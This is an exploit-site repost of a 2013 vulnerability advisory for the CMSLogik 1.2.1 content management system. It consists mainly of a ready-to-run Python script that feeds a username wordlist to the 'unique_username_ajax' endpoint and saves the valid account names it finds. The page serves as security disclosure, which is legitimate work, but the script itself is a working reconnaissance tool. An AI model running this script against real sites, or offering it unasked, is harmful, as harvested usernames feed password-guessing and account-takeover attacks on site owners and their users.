CMSLogik 1.2.1 (user param) User Enumeration Weakness

2013.04.14
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # # CMSLogik 1.2.1 (user param) User Enumeration Weakness # # # Vendor: ThemeLogik # Product web page: http://www.themelogik.com/cmslogik # Affected version: 1.2.1 and 1.2.0 # # Summary: CMSLogik is built on a solid & lightweight framework # called CodeIgniter, and design powered by Bootstrap. This # combination allows for greater security, extensive flexibility, # and ease of use. You can use CMSLogik for almost any niche that # your project might fall into. # # Desc: The weakness is caused due to the 'unique_username_ajax' # script enumerating the list of valid usernames when some characters # are provided via the 'user' parameter. # # Tested on: Apache/2.2.22 # PHP/5.3.15 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2013-5137 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5137.php # # # 05.04.2013 # import argparse, sys, json, urllib, urllib2, cookielib from colorama import Fore, Back, Style, init init() print '\n-----------------------------------------------' print 'User Enumeration Tool v0.1 for CMSLogik 1.2.x' print 'Copyleft (c) 2013, Zero Science Lab' print 'by lqwrm' print '-----------------------------------------------\n' parser = argparse.ArgumentParser() parser.add_argument('-t', help='target IP or hostname', action='store', dest='target') parser.add_argument('-d', help='target dir', action='store', dest='dir') parser.add_argument('-f', help='username wordlist', action='store', dest='file') args = parser.parse_args() if len(sys.argv) != 7: parser.print_help() print '\n[*] Example: cmslogik_enum.py -t zeroscience.mk -d cmslogik -f users.txt' sys.exit() host = args.target path = args.dir fn = args.file print '\n' try: users = open(args.file, 'r') except(IOError): print '[!] Error opening \'' +fn+ '\' file.' sys.exit() lines = users.read().splitlines() print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines()) users.close() cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) results = open('validusers.txt', 'w') for line in lines: chk_usr = urllib.urlencode({'user' : line}) try: xhr = json.load(opener.open('http://' +host+ '/' +path+ '/main/unique_username_ajax', chk_usr)) except: print '[!] Error connecting to http://' +host+ '/' +path sys.exit() print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET for key, value in xhr.iteritems(): fnrand = value break if fnrand == '1': print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Style.RESET_ALL+Fore.RESET+ ' as valid registered user.' results.write('%s\n' % line) results.close() print '\n[*] Enumeration completed!' print '[*] Valid usernames successfully written to \'validusers.txt\' file.'

References:

http://www.themelogik.com/cmslogik


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top